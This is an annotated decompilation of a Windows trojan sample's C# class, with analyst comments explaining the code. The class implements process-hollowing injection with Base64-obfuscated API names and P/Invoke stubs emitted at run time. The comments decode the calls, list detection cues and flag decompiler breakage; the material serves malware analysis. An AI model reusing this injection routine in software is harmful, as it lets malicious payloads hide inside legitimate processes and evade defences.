// Decompiled with JetBrains decompiler
|
|
// Type: uqeyrwlquci0gyeo0qjxqcszc
|
|
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
|
|
|
|
using System;
|
|
using System.Reflection;
|
|
using System.Reflection.Emit;
|
|
using System.Runtime.InteropServices;
|
|
|
|
/// <summary>
/// Decompiled static class from the sample named in the decompiler header of this file.
/// It holds two members: a routine that starts a host process suspended and writes a
/// caller-supplied PE image into it (the pattern usually called process hollowing or
/// "RunPE", MITRE ATT&amp;CK T1055.012), and a helper that builds P/Invoke stubs at run time.
/// </summary>
/// <remarks>
/// Analyst notes:
/// - Native API and DLL names are passed through ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r,
///   which is defined elsewhere and not shown here. Its arguments are valid Base64, so the
///   decoded names given in the comments below assume it is a Base64 decoder - confirm.
/// - The decompiler output is not compilable as shown: several "fixed" statements have empty
///   bodies and reuse the name numPtr, and the tool itself flags "fixed variable is out of
///   scope". Which buffer each numPtr dereference targets therefore cannot be read off this
///   text; structure-field names in the comments are inferred from buffer sizes and offsets.
/// - Observable behaviour useful for detection: a child process created with the suspended
///   flag, an unmap plus PAGE_EXECUTE_READWRITE allocation in that child, cross-process
///   memory writes, a thread-context change followed by resume, no static DllImport for any
///   of these APIs, and a dynamic assembly named "temp" defined on every native call.
/// </remarks>
public static class uqeyrwlquci0gyeo0qjxqcszc
|
|
{
|
|
// NOTE: these constants document the intended Win32 values, but the decompiled method body
// below uses the inlined numeric literals (65543, 4, 12288, 64, 23117, 17744) instead.
// 65543 = 0x00010007, the x86 CONTEXT_FULL flag value.
private const uint CONTEXT_FULL = 65543;
|
|
// Process creation flag: primary thread is created suspended.
private const int CREATE_SUSPENDED = 4;
|
|
// 4096 = 0x1000.
private const int MEM_COMMIT = 4096;
|
|
// 8192 = 0x2000.
private const int MEM_RESERVE = 8192;
|
|
// 64 = 0x40: memory that is readable, writable and executable at the same time.
private const int PAGE_EXECUTE_READWRITE = 64;
|
|
// 23117 = 0x5A4D, the bytes "MZ" that open a DOS/PE file.
private const ushort IMAGE_DOS_SIGNATURE = 23117;
|
|
// 17744 = 0x00004550, the bytes "PE\0\0" that open the NT headers.
private const uint IMAGE_NT_SIGNATURE = 17744;
|
|
|
|
/// <summary>
/// Starts <paramref name="hostProcess"/> suspended, copies the PE image held in
/// <paramref name="exeBuffer"/> into the new process, adjusts the suspended thread's
/// context and resumes it. Decoded call sequence (assuming the external string helper is a
/// Base64 decoder): CreateProcess, NtUnmapViewOfSection, VirtualAllocEx,
/// NtWriteVirtualMemory, NtGetContextThread, NtWriteVirtualMemory, NtSetContextThread,
/// NtResumeThread.
/// </summary>
/// <param name="exeBuffer">Raw bytes treated as a 32-bit PE file; only the MZ and PE signatures are validated.</param>
/// <param name="hostProcess">Passed as the first argument of the CreateProcess call.</param>
/// <param name="optionalArguments">When non-empty, appended to <paramref name="hostProcess"/> to form the command line.</param>
/// <returns>
/// false when a signature check fails or the process-creation call returns false; true
/// otherwise. The results of all later native calls are discarded, so true does not mean
/// the remaining steps succeeded.
/// </returns>
public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh(
|
|
byte[] exeBuffer,
|
|
string hostProcess,
|
|
string optionalArguments)
|
|
{
|
|
// 40 bytes = size of one PE section header; refilled for each section in the loop below.
byte[] dst1 = new byte[40];
|
|
// 248 bytes = size of the 32-bit NT headers; filled from exeBuffer at srcOffset.
byte[] dst2 = new byte[248];
|
|
// 64 bytes = size of the DOS header; filled from offset 0 of exeBuffer.
byte[] dst3 = new byte[64];
|
|
// Passed in the last CreateProcess parameter position (process information); element [0]
// is later used as the process handle and element [1] as the thread handle.
int[] numArray1 = new int[4];
|
|
// 716 bytes = size of the x86 thread CONTEXT structure - presumably the context buffer; confirm against the IL.
byte[] numArray2 = new byte[716];
|
|
// NOTE(review): the next four fixed statements have empty bodies and all declare numPtr.
// The decompiler lost the pointer scoping, so every later numPtr use is ambiguous.
fixed (byte* numPtr = &dst1[0])
|
|
;
|
|
fixed (byte* numPtr = &dst2[0])
|
|
;
|
|
fixed (byte* numPtr = &dst3[0])
|
|
;
|
|
fixed (byte* numPtr = &numArray2[0])
|
|
;
|
|
// ISSUE: fixed variable is out of scope
|
|
// Stores 65543 (the CONTEXT_FULL value) at offset 0 - presumably the flags field of the context buffer.
*(int*) numPtr = 65543;
|
|
// Copies the first 64 bytes of the input; there is no length check, so a shorter buffer makes BlockCopy throw.
Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
// 23117 = "MZ": input without a DOS signature is rejected.
if (*(ushort*) numPtr != (ushort) 23117)
|
|
return false;
|
|
// ISSUE: fixed variable is out of scope
|
|
// Offset 60 of the DOS header is e_lfanew, the file offset of the NT headers.
// The value comes straight from the input and is not range-checked before the copy below.
int srcOffset = *(int*) (numPtr + 60);
|
|
Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
// 17744 = "PE\0\0": input without an NT signature is rejected.
if (*(uint*) numPtr != 17744U)
|
|
return false;
|
|
// The external helper is called with an empty string here; its result is the default command line.
string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("");
|
|
// With arguments supplied, the command line becomes "<hostProcess> <optionalArguments>".
if (!string.IsNullOrEmpty(optionalArguments))
|
|
str = hostProcess + " " + optionalArguments;
|
|
// Literals decode to "kernel32" / "CreateProcess" (assuming Base64). The literal 4 is the
// CREATE_SUSPENDED flag; the 68-byte array sits in the startup-info parameter position and
// numArray1 in the process-information position. A false result ends the routine.
if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<bool>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="), new Type[10]
|
|
{
|
|
typeof (string),
|
|
typeof (string),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (bool),
|
|
typeof (int),
|
|
typeof (IntPtr),
|
|
typeof (string),
|
|
typeof (byte[]),
|
|
typeof (int[])
|
|
}, (object) hostProcess, (object) str, (object) IntPtr.Zero, (object) IntPtr.Zero, (object) false, (object) 4, (object) IntPtr.Zero, null, (object) new byte[68], (object) numArray1))
|
|
return false;
|
|
// ISSUE: fixed variable is out of scope
|
|
// Offset 52 of the 32-bit NT headers is the preferred image base (if numPtr refers to dst2 here).
IntPtr num1 = new IntPtr(*(int*) (numPtr + 52));
|
|
// "ntdll" / "NtUnmapViewOfSection" on the child process handle at that base address.
// The returned status (num2) is never examined.
int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1);
|
|
// ISSUE: fixed variable is out of scope
|
|
// "kernel32" / "VirtualAllocEx" in the child at the same base: 12288 = MEM_COMMIT | MEM_RESERVE,
// 64 = PAGE_EXECUTE_READWRITE, size read at offset 80 (SizeOfImage in the 32-bit NT headers).
// NOTE(review): when the allocation returns zero the method calls itself with the same
// arguments, ignores that result, and then carries on below with the failed allocation.
// Nothing bounds the recursion, and every retry starts another child process.
if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<IntPtr>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (int),
|
|
typeof (int)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1, (object) *(uint*) (numPtr + 80), (object) 12288, (object) 64) == IntPtr.Zero)
|
|
uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments);
|
|
// Pins the input buffer so its address can be handed to the native write call.
fixed (byte* numPtr = &exeBuffer[0])
|
|
{
|
|
// ISSUE: fixed variable is out of scope
|
|
// "ntdll" / "NtWriteVirtualMemory": copies the start of the input image to the base address
// in the child. The length is read at offset 84 (SizeOfHeaders in the 32-bit NT headers,
// if that numPtr refers to them - ambiguous in this output). Result discarded.
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) num1, (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 84), (object) IntPtr.Zero);
|
|
}
|
|
// ISSUE: fixed variable is out of scope
|
|
// One iteration per section: offset 6 of the 32-bit NT headers is the section count.
for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index)
|
|
{
|
|
// Loads section header number "index" from the table that follows the NT headers.
Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length);
|
|
// ISSUE: fixed variable is out of scope
|
|
// Offset 20 of a section header is the raw-data file offset; it indexes the input without
// any validation beyond the array bounds check.
fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)])
|
|
{
|
|
// ISSUE: fixed variable is out of scope
|
|
// ISSUE: fixed variable is out of scope
|
|
// "ntdll" / "NtWriteVirtualMemory": writes the section's raw data into the child at
// base + offset 12 (virtual address), with the length taken from offset 16 (raw size).
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (uint),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)), (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 16), (object) IntPtr.Zero);
|
|
}
|
|
}
|
|
// ISSUE: fixed variable is out of scope
|
|
// "ntdll" / "NtGetContextThread" on the suspended thread handle (numArray1[1]); result discarded.
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
|
|
// ISSUE: fixed variable is out of scope
|
|
// "ntdll" / "NtWriteVirtualMemory": a 4-byte write into the child at an address read from
// offset 172 of the buffer numPtr refers to. NOTE(review): the argument list as decompiled
// may not match the original IL - confirm before relying on it.
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (IntPtr),
|
|
typeof (int),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) (long) *(uint*) (numPtr + 172), (object) num1, (object) 4, (object) IntPtr.Zero);
|
|
// ISSUE: fixed variable is out of scope
|
|
// ISSUE: fixed variable is out of scope
|
|
// Stores base + the value at offset 40 (entry-point RVA in the 32-bit NT headers) at
// offset 176 of the context buffer, changing where the suspended thread will begin.
*(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40);
|
|
// ISSUE: fixed variable is out of scope
|
|
// "ntdll" / "NtSetContextThread": applies the modified context; status (num3) unused.
int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
|
|
// "ntdll" / "NtResumeThread": releases the child's thread; status (num4) unused.
int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="), new Type[2]
|
|
{
|
|
typeof (IntPtr),
|
|
typeof (IntPtr)
|
|
}, (object) (IntPtr) numArray1[1], (object) IntPtr.Zero);
|
|
// Reached regardless of whether the unmap, allocation, writes or context calls succeeded.
return true;
|
|
}
|
|
|
|
/// <summary>
/// Defines a P/Invoke stub with Reflection.Emit and invokes it, in place of a static
/// DllImport declaration. Each call creates a new in-memory dynamic assembly named "temp"
/// (AssemblyBuilderAccess.Run); nothing is cached between calls.
/// </summary>
/// <typeparam name="TR">Return type declared for the native function.</typeparam>
/// <param name="name">DLL name (second argument of DefinePInvokeMethod).</param>
/// <param name="method">Exported function name; also used to look the stub up again.</param>
/// <param name="typeArr">Parameter types of the generated stub.</param>
/// <param name="arguments">Values passed to the native call, boxed as objects.</param>
/// <returns>The value returned by the native function, cast to <typeparamref name="TR"/>.</returns>
public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt<TR>(
|
|
string name,
|
|
string method,
|
|
Type[] typeArr,
|
|
params object[] arguments)
|
|
{
|
|
// The module name literal decodes to "module" (assuming the external helper is a Base64 decoder).
ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl"));
|
|
// Declares a public static global P/Invoke method: Winapi calling convention, ANSI strings, PreserveSig.
moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig);
|
|
// Global methods only become callable after they are baked.
moduleBuilder.CreateGlobalFunctions();
|
|
// Invoked through reflection, so a failure in the native call surfaces as an invocation exception.
return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments);
|
|
}
|
|
}
|